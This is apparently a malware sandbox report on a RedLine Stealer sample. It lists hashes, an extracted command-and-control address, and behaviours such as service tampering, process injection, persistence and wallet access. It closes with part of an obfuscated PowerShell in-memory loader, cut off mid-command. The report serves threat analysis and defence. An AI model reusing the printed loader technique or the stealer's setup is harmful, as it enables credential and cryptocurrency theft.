Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
151s -
max time network
109s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
06/01/2023, 07:14
Static task
static1
Behavioral task
behavioral1
Sample
8aae493caafa6e42a5a7afe431aeac120ce4c152.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
8aae493caafa6e42a5a7afe431aeac120ce4c152.exe
Resource
win10v2004-20220812-en
General
-
Target
8aae493caafa6e42a5a7afe431aeac120ce4c152.exe
-
Size
197KB
-
MD5
78e69dd4d4eb058e9a2de5c4082c3133
-
SHA1
8aae493caafa6e42a5a7afe431aeac120ce4c152
-
SHA256
d3527f53eea79b90e0ea31e8c07a47924bdc0ed0dbaf635df7bb51fd580c91db
-
SHA512
42e6b6950f6ce3b21d107acffe1c68c19193ad6f54538caad9fc84d0d143ee6e753cfb4c64f96ef2fb22ef7c1049cf1496a94382d2166ff67312f6cad1444777
-
SSDEEP
6144:vmrFp1Uv1cVoar1HqOAORbMCIqxb/cTkc:vGFpv3vvbPb/cX
Malware Config
Extracted
redline
1
107.182.129.73:21733
-
auth_value
3a5bb0917495b4312d052a0b8977d2bb
Signatures
-
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/4288-177-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
description pid Process procid_target PID 4944 created 3244 4944 WerFault.exe 49 PID 4968 created 4232 4968 WerFault.exe 28 PID 1384 created 3396 1384 WerFault.exe 135 PID 3212 created 2120 3212 WerFault.exe 138 -
Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
description pid Process procid_target PID 4980 created 3020 4980 SmartDefRun.exe 51 PID 4980 created 3020 4980 SmartDefRun.exe 51 PID 4980 created 3020 4980 SmartDefRun.exe 51 PID 4980 created 3020 4980 SmartDefRun.exe 51 PID 740 created 596 740 powershell.EXE 3 PID 3884 created 4232 3884 svchost.exe 28 PID 3884 created 3244 3884 svchost.exe 49 PID 3884 created 4968 3884 svchost.exe 127 PID 3884 created 3396 3884 svchost.exe 135 PID 3884 created 2120 3884 svchost.exe 138 -
Blocklisted process makes network request 1 IoCs
flow pid Process 21 4992 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe -
Executes dropped EXE 5 IoCs
pid Process 3660 C4Loader.exe 3960 new2.exe 4512 SysApp.exe 4980 SmartDefRun.exe 3596 fodhelper.exe -
Stops running service(s) 3 TTPs
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 15 IoCs
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C0427F5F77D9B3A439FC620EDAAB6177 svchost.exe File opened for modification C:\Windows\System32\Tasks\Telemetry Logging svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2180 set thread context of 3132 2180 8aae493caafa6e42a5a7afe431aeac120ce4c152.exe 81 PID 3960 set thread context of 4288 3960 new2.exe 98 PID 4980 set thread context of 1336 4980 SmartDefRun.exe 121 PID 740 set thread context of 3612 740 powershell.EXE 126 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe SmartDefRun.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1792 sc.exe 3312 sc.exe 5008 sc.exe 4056 sc.exe 788 sc.exe -
Program crash 6 IoCs
pid pid_target Process procid_target 4924 2180 WerFault.exe 79 3644 3960 WerFault.exe 88 1708 3244 WerFault.exe 49 4192 4232 WerFault.exe 28 212 3396 WerFault.exe 135 5028 2120 WerFault.exe 138 -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2400 schtasks.exe 4552 schtasks.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4992 powershell.exe 4992 powershell.exe 4512 SysApp.exe 4512 SysApp.exe 4512 SysApp.exe 4512 SysApp.exe 4512 SysApp.exe 4512 SysApp.exe 4512 SysApp.exe 4512 SysApp.exe 4512 SysApp.exe 4512 SysApp.exe 4980 SmartDefRun.exe 4980 SmartDefRun.exe 2736 powershell.exe 2736 powershell.exe 4980 SmartDefRun.exe 4980 SmartDefRun.exe 4980 SmartDefRun.exe 4980 SmartDefRun.exe 1856 powershell.exe 1856 powershell.exe 4980 SmartDefRun.exe 4980 SmartDefRun.exe 740 powershell.EXE 2164 powershell.EXE 740 powershell.EXE 2164 powershell.EXE 4288 vbc.exe 740 powershell.EXE 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 3612 dllhost.exe 1708 WerFault.exe 1708 WerFault.exe 3612 dllhost.exe 3612 dllhost.exe 4192 WerFault.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3020 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4992 powershell.exe Token: SeDebugPrivilege 2736 powershell.exe Token: SeDebugPrivilege 1856 powershell.exe Token: SeIncreaseQuotaPrivilege 1856 powershell.exe Token: SeSecurityPrivilege 1856 powershell.exe Token: SeTakeOwnershipPrivilege 1856 powershell.exe Token: SeLoadDriverPrivilege 1856 powershell.exe Token: SeSystemProfilePrivilege 1856 powershell.exe Token: SeSystemtimePrivilege 1856 powershell.exe Token: SeProfSingleProcessPrivilege 1856 powershell.exe Token: SeIncBasePriorityPrivilege 1856 powershell.exe Token: SeCreatePagefilePrivilege 1856 powershell.exe Token: SeBackupPrivilege 1856 powershell.exe Token: SeRestorePrivilege 1856 powershell.exe Token: SeShutdownPrivilege 1856 powershell.exe Token: SeDebugPrivilege 1856 powershell.exe Token: SeSystemEnvironmentPrivilege 1856 powershell.exe Token: SeRemoteShutdownPrivilege 1856 powershell.exe Token: SeUndockPrivilege 1856 powershell.exe Token: SeManageVolumePrivilege 1856 powershell.exe Token: 33 1856 powershell.exe Token: 34 1856 powershell.exe Token: 35 1856 powershell.exe Token: 36 1856 powershell.exe Token: SeIncreaseQuotaPrivilege 1856 powershell.exe Token: SeSecurityPrivilege 1856 powershell.exe Token: SeTakeOwnershipPrivilege 1856 powershell.exe Token: SeLoadDriverPrivilege 1856 powershell.exe Token: SeSystemProfilePrivilege 1856 powershell.exe Token: SeSystemtimePrivilege 1856 powershell.exe Token: SeProfSingleProcessPrivilege 1856 powershell.exe Token: SeIncBasePriorityPrivilege 1856 powershell.exe Token: SeCreatePagefilePrivilege 1856 powershell.exe Token: SeBackupPrivilege 1856 powershell.exe Token: SeRestorePrivilege 1856 powershell.exe Token: SeShutdownPrivilege 1856 powershell.exe Token: SeDebugPrivilege 1856 powershell.exe Token: SeSystemEnvironmentPrivilege 1856 powershell.exe Token: SeRemoteShutdownPrivilege 1856 powershell.exe Token: SeUndockPrivilege 1856 powershell.exe Token: SeManageVolumePrivilege 1856 powershell.exe Token: 33 1856 powershell.exe Token: 34 1856 powershell.exe Token: 35 1856 powershell.exe Token: 36 1856 powershell.exe Token: SeIncreaseQuotaPrivilege 1856 powershell.exe Token: SeSecurityPrivilege 1856 powershell.exe Token: SeTakeOwnershipPrivilege 1856 powershell.exe Token: SeLoadDriverPrivilege 1856 powershell.exe Token: SeSystemProfilePrivilege 1856 powershell.exe Token: SeSystemtimePrivilege 1856 powershell.exe Token: SeProfSingleProcessPrivilege 1856 powershell.exe Token: SeIncBasePriorityPrivilege 1856 powershell.exe Token: SeCreatePagefilePrivilege 1856 powershell.exe Token: SeBackupPrivilege 1856 powershell.exe Token: SeRestorePrivilege 1856 powershell.exe Token: SeShutdownPrivilege 1856 powershell.exe Token: SeDebugPrivilege 1856 powershell.exe Token: SeSystemEnvironmentPrivilege 1856 powershell.exe Token: SeRemoteShutdownPrivilege 1856 powershell.exe Token: SeUndockPrivilege 1856 powershell.exe Token: SeManageVolumePrivilege 1856 powershell.exe Token: 33 1856 powershell.exe Token: 34 1856 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2180 wrote to memory of 3132 2180 8aae493caafa6e42a5a7afe431aeac120ce4c152.exe 81 PID 2180 wrote to memory of 3132 2180 8aae493caafa6e42a5a7afe431aeac120ce4c152.exe 81 PID 2180 wrote to memory of 3132 2180 8aae493caafa6e42a5a7afe431aeac120ce4c152.exe 81 PID 2180 wrote to memory of 3132 2180 8aae493caafa6e42a5a7afe431aeac120ce4c152.exe 81 PID 2180 wrote to memory of 3132 2180 8aae493caafa6e42a5a7afe431aeac120ce4c152.exe 81 PID 3132 wrote to memory of 4992 3132 vbc.exe 85 PID 3132 wrote to memory of 4992 3132 vbc.exe 85 PID 3132 wrote to memory of 4992 3132 vbc.exe 85 PID 4992 wrote to memory of 3660 4992 powershell.exe 87 PID 4992 wrote to memory of 3660 4992 powershell.exe 87 PID 4992 wrote to memory of 3660 4992 powershell.exe 87 PID 4992 wrote to memory of 3960 4992 powershell.exe 88 PID 4992 wrote to memory of 3960 4992 powershell.exe 88 PID 4992 wrote to memory of 3960 4992 powershell.exe 88 PID 4992 wrote to memory of 4512 4992 powershell.exe 89 PID 4992 wrote to memory of 4512 4992 powershell.exe 89 PID 4992 wrote to memory of 4512 4992 powershell.exe 89 PID 4992 wrote to memory of 4980 4992 powershell.exe 90 PID 4992 wrote to memory of 4980 4992 powershell.exe 90 PID 3960 wrote to memory of 4288 3960 new2.exe 98 PID 3960 wrote to memory of 4288 3960 new2.exe 98 PID 3960 wrote to memory of 4288 3960 new2.exe 98 PID 3960 wrote to memory of 4288 3960 new2.exe 98 PID 3960 wrote to memory of 4288 3960 new2.exe 98 PID 3520 wrote to memory of 4056 3520 cmd.exe 110 PID 3520 wrote to memory of 4056 3520 cmd.exe 110 PID 3520 wrote to memory of 788 3520 cmd.exe 111 PID 3520 wrote to memory of 788 3520 cmd.exe 111 PID 3520 wrote to memory of 1792 3520 cmd.exe 113 PID 3520 wrote to memory of 1792 3520 cmd.exe 113 PID 3520 wrote to memory of 3312 3520 cmd.exe 114 PID 3520 wrote to memory of 3312 3520 cmd.exe 114 PID 3520 wrote to memory of 5008 3520 cmd.exe 115 PID 3520 wrote to memory of 5008 3520 cmd.exe 115 PID 3520 wrote to memory of 1296 3520 cmd.exe 116 PID 3520 wrote to memory of 1296 3520 cmd.exe 116 PID 3520 wrote to memory of 4968 3520 cmd.exe 117 PID 3520 wrote to memory of 4968 3520 cmd.exe 117 PID 3520 wrote to memory of 1608 3520 cmd.exe 118 PID 3520 wrote to memory of 1608 3520 cmd.exe 118 PID 3520 wrote to memory of 5100 3520 cmd.exe 119 PID 3520 wrote to memory of 5100 3520 cmd.exe 119 PID 3520 wrote to memory of 1080 3520 cmd.exe 120 PID 3520 wrote to memory of 1080 3520 cmd.exe 120 PID 4980 wrote to memory of 1336 4980 SmartDefRun.exe 121 PID 740 wrote to memory of 3612 740 powershell.EXE 126 PID 740 wrote to memory of 3612 740 powershell.EXE 126 PID 740 wrote to memory of 3612 740 powershell.EXE 126 PID 740 wrote to memory of 3612 740 powershell.EXE 126 PID 740 wrote to memory of 3612 740 powershell.EXE 126 PID 740 wrote to memory of 3612 740 powershell.EXE 126 PID 740 wrote to memory of 3612 740 powershell.EXE 126 PID 740 wrote to memory of 3612 740 powershell.EXE 126 PID 740 wrote to memory of 3612 740 powershell.EXE 126 PID 3612 wrote to memory of 596 3612 dllhost.exe 3 PID 3612 wrote to memory of 652 3612 dllhost.exe 1 PID 3612 wrote to memory of 936 3612 dllhost.exe 16 PID 3612 wrote to memory of 1004 3612 dllhost.exe 11 PID 3612 wrote to memory of 432 3612 dllhost.exe 14 PID 3612 wrote to memory of 808 3612 dllhost.exe 13 PID 3612 wrote to memory of 1040 3612 dllhost.exe 15 PID 3612 wrote to memory of 1060 3612 dllhost.exe 20 PID 3612 wrote to memory of 1160 3612 dllhost.exe 17 PID 3612 wrote to memory of 1192 3612 dllhost.exe 18
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:652
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:596
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1004
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{dc34374f-25c8-4ecd-b943-c91a65192b53}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3612
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:808
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:432
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:936
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1160 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2476
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:OcEjBmjgkqZE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WhXSvbiLldmgvP,[Parameter(Position=1)][Type]$JcpufxBNFa)$yQkMsMFmeWN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+[Char](101)+''+[Char](99)+''+'t'+'e'+'d'+'D'+'e'+''+'l'+''+'e'+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+''+[Char](101)+''+'m'+''+'o'+'r'+'y'+''+'M'+''+[Char](111)+''+[Char](100)+'ul'+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+'l'+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+'y'+'p'+'e'+'','Cl'+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+'u'+'bli'+[Char](99)+''+','+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+''+'C'+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+[Char](65)+'ut'+'o'+''+'C'+'l'+'a'+''+[Char](115)+'s',[MulticastDelegate]);$yQkMsMFmeWN.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+'N'+'am'+[Char](101)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+','+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$WhXSvbiLldmgvP).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+'im'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$yQkMsMFmeWN.DefineMethod('I'+[Char](110)+''+[Char](118)+'o'+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+''+[Char](44)+'H'+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g,'+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+','+[Char](86)+''+'i'+''+'r'+''+[Char](116)+'u'+'a'+'l',$JcpufxBNFa,$WhXSvbiLldmgvP).SetImplementationFlags('R'+'u'+''+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $yQkMsMFmeWN.CreateType();}$LmwyDvPDRmwTo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 